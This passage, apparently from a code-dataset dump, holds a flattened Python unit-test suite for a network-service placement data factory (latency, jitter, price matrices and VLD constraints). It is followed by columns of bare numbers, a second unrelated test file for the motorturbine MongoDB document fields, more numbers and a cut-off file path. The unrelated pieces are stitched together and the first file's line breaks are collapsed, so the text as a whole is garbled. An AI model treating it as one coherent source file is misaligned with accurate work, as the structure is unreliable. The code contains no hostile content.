The following construct in the NS package yaml file: mgmt-network: 'false' will become a boolean in the MongoDB, and therefore the yaml used in these unit test must use yaml tag as follows: mgmt-network: !!bool False The modification also applies to 'true' => !!bool True This will ensure that the object returned from this function is as expected by PLA. """ with open(str(Path(self._adjust_path(nsd_file_name)))) as nsd_fd: test_data = yaml.safe_load_all(nsd_fd) return next(test_data) def _produce_ut_vnf_price_list(self): price_list_file = "vnf_price_list.yaml" with open(str(Path(self._adjust_path(price_list_file)))) as pl_fd: price_list_data = yaml.safe_load_all(pl_fd) return {i['vnfd']: {i1['vim_name']: i1['price'] for i1 in i['prices']} for i in next(price_list_data)} def _produce_ut_vnf_test_price_list(self, price_list): price_list_file = price_list with open(str(Path(self._adjust_path(price_list_file)))) as pl_fd: price_list_data = yaml.safe_load_all(pl_fd) return {i['vnfd']: {i1['vim_name']: i1['price'] for i1 in i['prices']} for i in next(price_list_data)} def test__produce_trp_link_characteristics_link_latency_with_more_vims(self): """ -test with more(other) vims compared to pil """ content_expected = [0, 0, 0, 0, 0, 120, 120, 130, 130, 140, 140, 230, 230, 240, 240, 340, 340, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767] nspdf = NsPlacementDataFactory( self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts_more_vims), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1_keys.yaml'), pinning=None) pil_latencies = nspdf._produce_trp_link_characteristics_data('pil_latency') content_produced = [i for row in pil_latencies for i in row] self.assertEqual(Counter(content_expected), Counter(content_produced), 'trp_link_latency incorrect') def test__produce_trp_link_characteristics_link_latency_with_fewer_vims(self): """ -test with fewer vims compared to pil :return: """ content_expected = [0, 0, 0, 
120, 120, 140, 140, 240, 240] nspdf = NsPlacementDataFactory( self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts_fewer_vims), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1_keys.yaml'), pinning=None) pil_latencies = nspdf._produce_trp_link_characteristics_data('pil_latency') content_produced = [i for row in pil_latencies for i in row] self.assertEqual(Counter(content_expected), Counter(content_produced), 'trp_link_latency incorrect') def test__produce_trp_link_characteristic_not_supported(self): """ - test with non-supported characteristic """ nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1.yaml'), pinning=None) with self.assertRaises(Exception) as e: nspdf._produce_trp_link_characteristics_data('test_no_support') self.assertRegex(str(e.exception), r'characteristic.*not supported', "invalid exception content") def test__produce_trp_link_characteristics_link_latency(self): """ -test with full set of vims as in pil -test with fewer vims compared to pil -test with more(other) vims compared to pil -test with invalid/corrupt pil configuration file (e.g. 
missing endpoint), empty file, not yaml conformant - test with non-supported characteristic :return: """ content_expected = [0, 0, 0, 0, 120, 120, 130, 130, 140, 140, 230, 230, 240, 240, 340, 340] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1_keys.yaml'), pinning=None) pil_latencies = nspdf._produce_trp_link_characteristics_data('pil_latency') content_produced = [i for row in pil_latencies for i in row] self.assertEqual(Counter(content_expected), Counter(content_produced), 'trp_link_latency incorrect') def test__produce_trp_link_characteristics_link_jitter(self): """ -test with full set of vims as in pil """ content_expected = [0, 0, 0, 0, 1200, 1200, 1300, 1300, 1400, 1400, 2300, 2300, 2400, 2400, 3400, 3400] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1_keys.yaml'), pinning=None) pil_jitter = nspdf._produce_trp_link_characteristics_data('pil_jitter') content_produced = [i for row in pil_jitter for i in row] self.assertEqual(Counter(content_expected), Counter(content_produced), 'trp_link_jitter incorrect') def test__produce_trp_link_characteristics_link_jitter_with_fewer_vims(self): """ -test with fewer vims compared to pil, link jitter """ content_expected = [0, 0, 0, 1200, 1200, 1400, 1400, 2400, 2400] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(self.vim_accounts_fewer_vims), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1_keys.yaml'), pinning=None) pil_latencies = nspdf._produce_trp_link_characteristics_data('pil_jitter') content_produced = [i for row in pil_latencies for i in row] self.assertEqual(Counter(content_expected), Counter(content_produced), 'trp_link_jitter incorrect') def 
test__produce_trp_link_characteristics_link_jitter_with_more_vims(self): """ -test with more vims compared to pil, link jitter """ content_expected = [0, 0, 0, 0, 0, 1200, 1200, 1300, 1300, 1400, 1400, 2300, 2300, 2400, 2400, 3400, 3400, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(self.vim_accounts_more_vims), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1_keys.yaml'), pinning=None) pil_latencies = nspdf._produce_trp_link_characteristics_data('pil_jitter') content_produced = [i for row in pil_latencies for i in row] self.assertEqual(Counter(content_expected), Counter(content_produced), 'trp_link_jitter incorrect') def test__produce_trp_link_characteristics_link_price(self): """ -test with full set of vims as in pil """ content_expected = [0, 0, 0, 0, 12, 12, 13, 13, 14, 14, 23, 23, 24, 24, 34, 34] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1_keys.yaml'), pinning=None) pil_prices = nspdf._produce_trp_link_characteristics_data('pil_price') content_produced = [i for row in pil_prices for i in row] self.assertEqual(Counter(content_expected), Counter(content_produced), 'invalid trp link prices') def test__produce_trp_link_characteristics_link_price_with_fewer_vims(self): """ -test with fewer vims compared to pil """ content_expected = [0, 0, 0, 12, 12, 14, 14, 24, 24] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(self.vim_accounts_fewer_vims), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1_keys.yaml'), pinning=None) pil_prices = nspdf._produce_trp_link_characteristics_data('pil_price') content_produced = [i for row in pil_prices for i in row] self.assertEqual(Counter(content_expected), Counter(content_produced), 'invalid trp link 
prices') def test__produce_trp_link_characteristics_partly_constrained(self): content_expected = [0, 0, 0, 0, 32767, 32767, 32767, 32767, 1200, 1200, 1400, 1400, 2400, 2400, 3400, 3400] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest2_keys.yaml'), pinning=None) pil_jitter = nspdf._produce_trp_link_characteristics_data('pil_jitter') content_produced = [i for row in pil_jitter for i in row] self.assertEqual(Counter(content_expected), Counter(content_produced), 'invalid trp link jitter, partly constrained') def test__produce_vld_desc_partly_constrained(self): vld_desc_expected = [{'cp_refs': ['one', 'two'], 'jitter': 30}, {'cp_refs': ['two', 'three'], 'latency': 120}] nsd = self._get_ut_nsd_from_file('nsd_unittest2.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc incorrect") def test__produce_trp_link_characteristics_link_latency_not_yaml_conformant(self): """ -test with invalid/corrupt pil configuration file (not yaml conformant) """ with self.assertRaises(Exception) as e: _ = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('not_yaml_conformant.yaml'), pinning=None) self.assertRegex(str(e.exception), r'mapping values are not allowed here.*', "invalid exception content") def test__produce_trp_link_characteristics_with_invalid_pil_config(self): """ -test with invalid/corrupt pil configuration file (missing endpoint) """ nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), 
self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('corrupt_pil_endpoints_config_unittest1.yaml'), pinning=None) with self.assertRaises(Exception) as e: _ = nspdf._produce_trp_link_characteristics_data('pil_latency') self.assertEqual('list index out of range', str(e.exception), "unexpected exception") def test__produce_vld_desc_w_instantiate_override(self): vld_desc_expected = [{'cp_refs': ['one', 'two'], 'latency': 150, 'jitter': 30}, {'cp_refs': ['two', 'three'], 'latency': 90, 'jitter': 30}] nsd = self._get_ut_nsd_from_file('nsd_unittest_no_vld_constraints.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints=None) self.assertNotEqual(nspdf._produce_vld_desc(), vld_desc_expected, "vld_desc incorrect") def test__produce_vld_desc_nsd_w_instantiate_wo(self): """ nsd w/ constraints, instantiate w/o constraints :return: """ vld_desc_expected = [{'cp_refs': ['one', 'two'], 'latency': 150, 'jitter': 30}, {'cp_refs': ['two', 'three'], 'latency': 90, 'jitter': 30}] nsd = self._get_ut_nsd_from_file('nsd_unittest3.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints=None) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc incorrect") def test__produce_vld_desc_nsd_w_instantiate_w(self): """ nsd w/ constraints, instantiate w/ constraints => override :return: """ vld_desc_expected = [{'cp_refs': ['one', 'two'], 'latency': 120, 'jitter': 21}, {'cp_refs': ['two', 'three'], 'latency': 121, 'jitter': 22}] nsd = self._get_ut_nsd_from_file('nsd_unittest3.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = 
NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints={ 'vld-constraints': [{'id': 'three_vnf_constrained_nsd_vld1', 'link-constraints': {'latency': 120, 'jitter': 21}}, {'id': 'three_vnf_constrained_nsd_vld2', 'link-constraints': {'latency': 121, 'jitter': 22}}]}) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc incorrect") def test__produce_vld_desc_nsd_wo_instantiate_wo(self): """ nsd w/o constraints, instantiate w/o constraints = no constraints in model :return: """ vld_desc_expected = [{'cp_refs': ['one', 'two']}, {'cp_refs': ['two', 'three']}] nsd = self._get_ut_nsd_from_file('nsd_unittest_no_vld_constraints.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints=None) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc incorrect") def test__produce_vld_desc_nsd_wo_instantiate_w(self): """ nsd w/o constraints, instantiate w/ constraints => add constraints :return: """ vld_desc_expected = [{'cp_refs': ['one', 'two'], 'latency': 140, 'jitter': 41}, {'cp_refs': ['two', 'three'], 'latency': 141, 'jitter': 42}] nsd = self._get_ut_nsd_from_file('nsd_unittest_no_vld_constraints.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints={ 'vld-constraints': [{'id': 'three_vnf_constrained_nsd_vld1', 'link-constraints': {'latency': 140, 'jitter': 41}}, {'id': 'three_vnf_constrained_nsd_vld2', 'link-constraints': {'latency': 141, 'jitter': 42}}]}) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc 
incorrect") def test__produce_vld_desc_nsd_wo_instantiate_w_faulty_input(self): """ nsd w/o constraints, instantiate w/ constraints => add constraints that can be parsed :return: """ vld_desc_expected = [{'cp_refs': ['one', 'two']}, {'cp_refs': ['two', 'three'], 'latency': 151}] nsd = self._get_ut_nsd_from_file('nsd_unittest_no_vld_constraints.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints={'vld-constraints': [{'id': 'not_included_vld', 'misspelled-constraints': {'latency': 120, 'jitter': 20}}, {'id': 'three_vnf_constrained_nsd_vld2', 'link-constraints': { 'latency': 151}}]}) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc incorrect") def test__produce_vld_desc_nsd_wo_instantiate_w_faulty_input_again(self): """ nsd w/o constraints, instantiate w/ faulty constraints => add constraints that can be parsed :return: """ vld_desc_expected = [{'cp_refs': ['one', 'two'], 'jitter': 21}, {'cp_refs': ['two', 'three']}] nsd = self._get_ut_nsd_from_file('nsd_unittest_no_vld_constraints.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints={ 'vld-constraints': [{'id': 'three_vnf_constrained_nsd_vld1', 'link-constraints': {'delay': 120, 'jitter': 21}}, {'id': 'three_vnf_constrained_nsd_vld2', 'misspelled-constraints': {'latency': 121, 'jitter': 22}}]}) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc incorrect") def test__produce_vld_desc_mgmt_network(self): vld_desc_expected = [{'cp_refs': ['1', '2'], 'latency': 120, 'jitter': 20}, {'cp_refs': ['2', '4'], 'latency': 50, 'jitter': 10}, {'cp_refs': ['2', '3'], 'latency': 20, 'jitter': 10}, ] nsd = 
self._get_ut_nsd_from_file('test_five_nsd.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints=None) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc incorrect") def test__produce_vld_desc_single_vnf_nsd(self): vld_desc_expected = [] nsd = self._get_ut_nsd_from_file('nsd_unittest4.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints=None) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc_incorrect") def test__produce_vld_desc_slice_nsd(self): vld_desc_expected = [] nsd = self._get_ut_nsd_from_file('slice_hackfest_middle_nsd.yaml') nsd = nsd['nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints=None) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc_incorrect") def test__produce_vld_desc(self): """ :return: """ vld_desc_expected = [{'cp_refs': ['one', 'two'], 'latency': 150, 'jitter': 30}, {'cp_refs': ['two', 'three'], 'latency': 90, 'jitter': 30}] nsd = self._get_ut_nsd_from_file('nsd_unittest3.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints=None) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc incorrect") def test__produce_ns_desc(self): """ ToDo - price list sheet with more vims than associated with session - price list sheet with 
fewer vims than associated with session - nsd with different vndfd-id-refs - fault case scenarios with non-existing vims, non-existing vnfds """ nsd = self._get_ut_nsd_from_file('nsd_unittest3.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None) ns_desc = nspdf._produce_ns_desc() # check that all expected member-vnf-index are present vnfs = [e['vnf_id'] for e in ns_desc] self.assertEqual(Counter(['one', 'two', 'three']), Counter(vnfs), 'vnf_id invalid') expected_keys = ['vnf_id', 'vnf_price_per_vim'] for e in ns_desc: # check that vnf_price_per_vim has proper values self.assertEqual(Counter([5, 10, 30, 30]), Counter(e['vnf_price_per_vim']), 'vnf_price_per_vim invalid') # check that no pinning directives included self.assertEqual(Counter(expected_keys), Counter(e.keys()), 'pinning directive misplaced') def test__produce_ns_desc_with_more_vims(self): nsd = self._get_ut_nsd_from_file('nsd_unittest1.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(self.vim_accounts_more_vims), self._produce_ut_vnf_test_price_list('vnf_price_list_more_vims.yaml'), nsd=nsd, pil_info=None, pinning=None) ns_desc = nspdf._produce_ns_desc() # check that all expected member-vnf-index are present vnfs = [e['vnf_id'] for e in ns_desc] self.assertEqual(Counter([1, 3, 2]), Counter(vnfs), 'vnf_id invalid') expected_keys = ['vnf_id', 'vnf_price_per_vim'] for e in ns_desc: # check that vnf_price_per_vim has proper values self.assertEqual(Counter([5, 10, 30, 30, 3]), Counter(e['vnf_price_per_vim']), 'vnf_price_per_vim invalid') # check that no pinning directives included self.assertEqual(Counter(expected_keys), Counter(e.keys()), 'pinning directive misplaced') def test__produce_ns_desc_with_fewer_vims(self): nsd = self._get_ut_nsd_from_file('nsd_unittest1.yaml') nsd = 
nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(self.vim_accounts_fewer_vims), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None) ns_desc = nspdf._produce_ns_desc() # check that all expected member-vnf-index are present vnfs = [e['vnf_id'] for e in ns_desc] self.assertEqual(Counter([1, 3, 2]), Counter(vnfs), 'vnf_id invalid') expected_keys = ['vnf_id', 'vnf_price_per_vim'] for e in ns_desc: # check that vnf_price_per_vim has proper values self.assertEqual(Counter([5, 10, 30]), Counter(e['vnf_price_per_vim']), 'vnf_price_per_vim invalid') # check that no pinning directives included self.assertEqual(Counter(expected_keys), Counter(e.keys()), 'pinning directive misplaced') def test__produce_ns_desc_w_pinning(self): nsd = self._get_ut_nsd_from_file('nsd_unittest3.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] pinning = [{'member-vnf-index': 'two', 'vimAccountId': '331ffdec-44a8-4707-94a1-af7a292d9735'}] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=pinning) ns_desc = nspdf._produce_ns_desc() # check that all expected member-vnf-index are present vnfs = [e['vnf_id'] for e in ns_desc] self.assertEqual(Counter(['one', 'three', 'two']), Counter(vnfs), 'vnf_id invalid') for e in ns_desc: # check that vnf_price_per_vim has proper values self.assertEqual(Counter([5, 10, 30, 30]), Counter(e['vnf_price_per_vim']), 'vnf_price_per_vim invalid') # check that member-vnf-index 2 is pinned correctly if e['vnf_id'] == 'two': self.assertTrue('vim_account' in e.keys(), 'missing pinning directive') self.assertTrue(pinning[0]['vimAccountId'] == e['vim_account'][3:].replace('_', '-'), 'invalid pinning vim-account') else: self.assertTrue('vim-account' not in e.keys(), 'pinning directive misplaced') @mock.patch.object(NsPlacementDataFactory, '_produce_trp_link_characteristics_data') 
@mock.patch.object(NsPlacementDataFactory, '_produce_vld_desc') @mock.patch.object(NsPlacementDataFactory, '_produce_ns_desc') def test_create_ns_placement_data_wo_order(self, mock_prd_ns_desc, mock_prd_vld_desc, mock_prd_trp_link_char): """ :return: """ vim_accounts_expected = [v.replace('-', '_') for v in ['vim92b056a7-38f5-438d-b8ee-3f93b3531f87', 'vim6618d412-d7fc-4eb0-a6f8-d2c258e0e900', 'vim331ffdec-44a8-4707-94a1-af7a292d9735', 'vimeda92f47-29b9-4007-9709-c1833dbfbe31']] nsd = self._get_ut_nsd_from_file('nsd_unittest3.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=self._populate_pil_info('pil_unittest1.yaml'), pinning=None, order_constraints=None) nspd = nspdf.create_ns_placement_data() self.assertEqual(Counter(vim_accounts_expected), Counter(nspd['vim_accounts']), "vim_accounts incorrect") # mock1.assert_called_once() Note for python > 3.5 self.assertTrue(mock_prd_ns_desc.called, '_produce_ns_desc not called') # mock2.assert_called_once() Note for python > 3.5 self.assertTrue(mock_prd_vld_desc.called, ' _produce_vld_desc not called') mock_prd_trp_link_char.assert_has_calls([call('pil_latency'), call('pil_jitter'), call('pil_price')]) regexps = [r"\{.*\}", r".*'file':.*mznplacement.py", r".*'time':.*datetime.datetime\(.*\)"] generator_data = str(nspd['generator_data']) for regex in regexps: self.assertRegex(generator_data, regex, "generator data invalid") @mock.patch.object(NsPlacementDataFactory, '_produce_trp_link_characteristics_data') @mock.patch.object(NsPlacementDataFactory, '_produce_vld_desc') @mock.patch.object(NsPlacementDataFactory, '_produce_ns_desc') def test_create_ns_placement_data_w_order(self, mock_prd_ns_desc, mock_prd_vld_desc, mock_prd_trp_link_char): """ :return: """ vim_accounts_expected = [v.replace('-', '_') for v in ['vim92b056a7-38f5-438d-b8ee-3f93b3531f87', 
'vim6618d412-d7fc-4eb0-a6f8-d2c258e0e900', 'vim331ffdec-44a8-4707-94a1-af7a292d9735', 'vimeda92f47-29b9-4007-9709-c1833dbfbe31']] nsd = self._get_ut_nsd_from_file('nsd_unittest3.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=self._populate_pil_info('pil_unittest1.yaml'), pinning=None, order_constraints={ 'vld-constraints': [{'id': 'three_vnf_constrained_nsd_vld1', 'link-constraints': {'latency': 120, 'jitter': 21}}, {'id': 'three_vnf_constrained_nsd_vld2', 'link-constraints': {'latency': 121, 'jitter': 22}}]} ) nspd = nspdf.create_ns_placement_data() self.assertEqual(Counter(vim_accounts_expected), Counter(nspd['vim_accounts']), "vim_accounts incorrect") # mock1.assert_called_once() Note for python > 3.5 self.assertTrue(mock_prd_ns_desc.called, '_produce_ns_desc not called') # mock2.assert_called_once() Note for python > 3.5 self.assertTrue(mock_prd_vld_desc.called, ' _produce_vld_desc not called') mock_prd_trp_link_char.assert_has_calls([call('pil_latency'), call('pil_jitter'), call('pil_price')]) regexps = [r"\{.*\}", r".*'file':.*mznplacement.py", r".*'time':.*datetime.datetime\(.*\)"] generator_data = str(nspd['generator_data']) for regex in regexps: self.assertRegex(generator_data, regex, "generator data invalid") if __name__ == "__main__": if __name__ == '__main__': unittest.main()
62.696203
120
0.53515
4,918
49,530
5.068117
0.092721
0.033099
0.031294
0.024875
0.87005
0.852598
0.835948
0.822869
0.811113
0.791976
0
0.08592
0.357319
49,530
789
121
62.775665
0.697097
0.07658
0
0.747826
0
0
0.22332
0.084997
0
0
0
0.002535
0.088696
1
0.062609
false
0.02087
0.013913
0
0.095652
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
73cd90dc38d5d3941cfd82df154fcb2affc3dad2
4,691
py
Python
tests/fields/test_document_field.py
BFriedrichs/motorturbine
a9585bef6959f8ceede2b64e4c296524f797aa68
[ "MIT" ]
1
2019-04-16T14:47:32.000Z
2019-04-16T14:47:32.000Z
tests/fields/test_document_field.py
BFriedrichs/motorturbine
a9585bef6959f8ceede2b64e4c296524f797aa68
[ "MIT" ]
null
null
null
tests/fields/test_document_field.py
BFriedrichs/motorturbine
a9585bef6959f8ceede2b64e4c296524f797aa68
[ "MIT" ]
null
null
null
import pytest from motorturbine import BaseDocument, fields, errors, connection, updateset from pymongo import errors as pymongo_errors @pytest.mark.asyncio async def test_document(db_config, database): connection.Connection.connect(**db_config) class IntDoc(BaseDocument): num = fields.IntField() class EmbedDoc(BaseDocument): ref = fields.DocumentField(IntDoc) doc1 = IntDoc(num=2) ref_doc = EmbedDoc(ref=doc1) await ref_doc.save() coll = database['EmbedDoc'] saved = coll.find_one() assert saved['ref'] == doc1.to_json() @pytest.mark.asyncio async def test_load_document(db_config, database): connection.Connection.connect(**db_config) class IntDoc(BaseDocument): num = fields.IntField() class EmbedDoc(BaseDocument): ref = fields.DocumentField(IntDoc) doc1 = IntDoc(num=2) ref_doc = EmbedDoc(ref=doc1) await ref_doc.save() loaded = await EmbedDoc.get_object() assert hasattr(loaded, 'ref') assert hasattr(loaded.ref, 'num') assert loaded.ref.num == 2 @pytest.mark.asyncio async def test_update_document(db_config, database): connection.Connection.connect(**db_config) class IntDoc(BaseDocument): num = fields.IntField() class EmbedDoc(BaseDocument): ref = fields.DocumentField(IntDoc) doc1 = IntDoc(num=2) ref_doc = EmbedDoc(ref=doc1) await ref_doc.save() ref_doc.ref.num = 10 await ref_doc.save() coll = database['EmbedDoc'] saved = coll.find_one() assert ref_doc.ref.num == 10 assert saved['ref']['num'] == 10 @pytest.mark.asyncio async def test_load_update(db_config, database): connection.Connection.connect(**db_config) class IntDoc(BaseDocument): num = fields.IntField() class EmbedDoc(BaseDocument): ref = fields.DocumentField(IntDoc) doc1 = IntDoc(num=2) ref_doc = EmbedDoc(ref=doc1) await ref_doc.save() ref_doc.ref.num = 10 await ref_doc.save() loaded = await EmbedDoc.get_object() assert hasattr(loaded, 'ref') assert hasattr(loaded.ref, 'num') assert loaded.ref.num == 10 @pytest.mark.asyncio async def test_map_embed(db_config, database): connection.Connection.connect(**db_config) 
class IntDoc(BaseDocument): num = fields.IntField() class EmbedDoc(BaseDocument): ref = fields.MapField(fields.DocumentField(IntDoc)) doc = EmbedDoc(ref={'test': IntDoc(num=5)}) await doc.save() assert doc.ref['test'].num == 5 saved = await EmbedDoc.get_object() assert doc.ref['test'].num == 5 doc.ref['test'].num = 10 doc.ref['test'].num = updateset.Inc(5) await doc.save() saved = await EmbedDoc.get_object() assert doc.ref['test'].num == 15 @pytest.mark.asyncio async def test_list_embed(db_config, database): connection.Connection.connect(**db_config) class IntDoc(BaseDocument): num = fields.IntField() class EmbedDoc(BaseDocument): ref = fields.ListField(fields.DocumentField(IntDoc)) doc = EmbedDoc(ref=[IntDoc(num=5), IntDoc(num=10)]) await doc.save() assert doc.ref[0].num == 5 assert doc.ref[1].num == 10 saved = await EmbedDoc.get_object() assert doc.ref[0].num == 5 assert doc.ref[1].num == 10 doc.ref[0].num = 10 doc.ref[0].num = updateset.Inc(5) await doc.save() saved = await EmbedDoc.get_object() assert doc.ref[0].num == 15 @pytest.mark.asyncio async def test_set_map(db_config, database): connection.Connection.connect(**db_config) class IntDoc(BaseDocument): num = fields.IntField() class EmbedDoc(BaseDocument): ref_map = fields.MapField(fields.DocumentField(IntDoc)) doc = EmbedDoc(ref_map={'a': IntDoc(num=0)}) await doc.save() saved = await EmbedDoc.get_object() saved.ref_map = {'another': IntDoc(num=999), 'test': IntDoc(num=-5)} await saved.save() saved = await EmbedDoc.get_object() json = {'another': {'num': 999}, 'test': {'num': -5}} assert saved.to_json()['ref_map'] == json @pytest.mark.asyncio async def test_set_list(db_config, database): connection.Connection.connect(**db_config) class IntDoc(BaseDocument): num = fields.IntField() class EmbedDoc(BaseDocument): ref_lst = fields.ListField(fields.DocumentField(IntDoc)) doc = EmbedDoc(ref_lst=[IntDoc(num=5)]) await doc.save() saved = await EmbedDoc.get_object() saved.ref_lst = [IntDoc(num=10), IntDoc(num=11)] 
await saved.save() saved = await EmbedDoc.get_object() json = [{'num': 10}, {'num': 11}] assert saved.to_json()['ref_lst'] == json
24.432292
76
0.664251
610
4,691
4.996721
0.103279
0.041995
0.052493
0.072178
0.893701
0.870079
0.823819
0.797572
0.710958
0.658793
0
0.018928
0.200384
4,691
191
77
24.560209
0.793655
0
0
0.71875
0
0
0.023449
0
0
0
0
0
0.148438
1
0
false
0
0.023438
0
0.273438
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
73d42734ec63ff2475c32dd0394530eca6b78484
37,456
py
Python
scripts/matrix_transform.py
ChavezResearchLab/3CL_protease_DMS
14593bdbc4586393eec6ec1d9ebbf3ef34eda44b
[ "MIT" ]
null
null
null
scripts/matrix_transform.py
ChavezResearchLab/3CL_protease_DMS
14593bdbc4586393eec6ec1d9ebbf3ef34eda44b
[ "MIT" ]
1
2021-04-13T19:27:36.000Z
